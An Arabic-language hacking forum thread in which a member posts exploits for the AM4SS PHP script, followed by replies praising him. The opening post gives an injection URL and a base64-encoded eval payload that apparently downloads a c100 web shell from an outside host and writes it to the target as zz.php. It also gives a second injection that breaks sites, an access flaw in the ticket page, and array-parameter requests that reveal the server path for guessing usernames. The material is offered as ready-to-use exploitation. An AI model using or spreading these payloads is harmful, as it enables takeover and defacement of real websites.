1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. Abu Abdullah
    rank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    27
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الوظيفة:
    طآإلبَ
    الإقامة:
    جُ ــــده
    بسم الله الرحمن الرحيم

    السلام عليكم

    فحصت سكربت
    AM4SS

    لقيت كم ثغرة ماهي خطيره وحبيت بالمره احط باقي ثغرات السكربت في الموضوع


    طبعا كان الثغرة الاولى من اكتشاف اورنج مان
    وهي بالشكل التالي



    كود:
    [COLOR=#0000BB]www[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]ddd[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]com[/COLOR][COLOR=#007700]/global.[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?[/COLOR][COLOR=#0000BB]bn[/COLOR][COLOR=#007700]=[/COLOR]

    الاستغلال هتضيف هالكود بعد =


    كود:
    eval(base64_decode(JGZpbGUgPSBmb3BlbigienoucGhwIiAsIncrIik7JHNhPWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnNoM2xsLm9yZy9jMTAwLnR4dCIpOyR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLCRzYSk7)

    وبتلقى شل بهالاسم zz.php


    الثغرة الثانيه نفس النوع بس انها تعطب الموقع



    كود:
    [COLOR=#0000BB]www[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]gg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]com[/COLOR][COLOR=#FF8000]//admincp/global.php?Checker=youStop();[/COLOR]

    واظن ان هالثغرتين من نفس المبرمج اضافها



    وثغرة اكسس بهالمكان طبعا الاستفاده منها يتطلب صفحة html



    كود:
    [COLOR=#0000BB]tickets[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?do=[/COLOR][COLOR=#0000BB]add[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]step[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]2[/COLOR]

    [​IMG]


    االحين اخطاء تتسسب باظهار مسار الموقع بيفيدني في استخراج اليوزر
    والتخمين

    تدخل ع هالمسار
    login.php
    وبعدها تضغط دخول وتشغل الاداءة مثل الصوره

    [​IMG]



    كود:
    [COLOR=#0000BB]password[/COLOR][COLOR=#007700][]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]useremail[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]sample[/COLOR][COLOR=#007700]%[/COLOR][COLOR=#0000BB]40w3afl[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]tst[/COLOR]

    وبعد
    /



    كود:
    [COLOR=#0000BB]tickets[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?do=[/COLOR][COLOR=#0000BB]add[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]step[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]2[/COLOR]




    بنفس الطريقة الا قبلها


    كود:
    [COLOR=#0000BB]message[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]20[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]subject[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]sdfdsffggrgrt[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]3[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]useremail[/COLOR][COLOR=#007700][]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]userfullname[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]aamaqwdsa[/COLOR]


     
    جاري تحميل الصفحة...
  2. ҢącҜęЯ .:: <font color="#669999"><b>أستاذ مشارك</b></font
    rankrank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2011
    عدد المشاركات:
    74
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الوظيفة:
    مكتشف ثغرات
    الإقامة:
    (KsA)
    نظام التشغيل:
    Linux
    رد: ثغرات سكربت am4ss

    بطل وربي


    واصل دون فواصل



     
  3. الحربي
    rankrank
    DeveloPer Plus

    عضو منذ:
    ‏9 ديسمبر 2011
    عدد المشاركات:
    69
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    Ӄ Ŵ Ť
    رد: ثغرات سكربت am4ss

    مشكور اخي واصل الى الآمام​
     
  4. THE SN!PER <div class="smallfont"><span style="font-weight: b
    rank
    ExpErt DeveloPer

    عضو منذ:
    ‏2 أكتوبر 2011
    عدد المشاركات:
    32
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    أولها T وآخرها T
    نظام التشغيل:
    Linux
    رد: ثغرات سكربت am4ss

    بارك الله فيك عزيزي بس لومكمل جميلك واضع الأداة #:"
     
  5. Numb3rs
    rank
    Developer

    عضو منذ:
    ‏20 يوليو 2012
    عدد المشاركات:
    10
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    رد: ثغرات سكربت am4ss

    جــاري التجربـة .. تقبل تحياتي
     
  6. Dr.MOT Support Iq-Team
    إدارة الموقع

    عضو منذ:
    ‏2 سبتمبر 2011
    عدد المشاركات:
    702
    الإعجابات المتلقاة:
    5,540
    نقاط الجائزة:
    226
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    CSS
    Facebook:
    YouTube:
    رد: ثغرات سكربت am4ss

    وعليكم السلام ورحمة الله وبركاته

    بالفعل موضوعك رائع ابو عبد الله وراح انزل الملف المصاب بالثغرة مع الترقيع

    موفق
     
  7. Abu Abdullah
    rank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    27
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الوظيفة:
    طآإلبَ
    الإقامة:
    جُ ــــده
    رد: ثغرات سكربت am4ss

    مشكوووورين جميعا
    واتمنى الاستفادى للجميع
    )5:"​
     
  8. HASsouni
    rank
    Developer

    عضو منذ:
    ‏31 يوليو 2012
    عدد المشاركات:
    20
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: ثغرات سكربت am4ss

    الله يعطيك العافيه

    على جهودك

    أأخي ​
     
  9. شنايدر العطوي
    rank
    Developer

    عضو منذ:
    ‏10 أكتوبر 2012
    عدد المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: ثغرات سكربت am4ss

    يعطيك العافيه يالغآلي &:":
     
  10. System³²
    rank
    Developer

    عضو منذ:
    ‏29 أكتوبر 2012
    عدد المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: ثغرات سكربت am4ss

    روعهة
     
الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...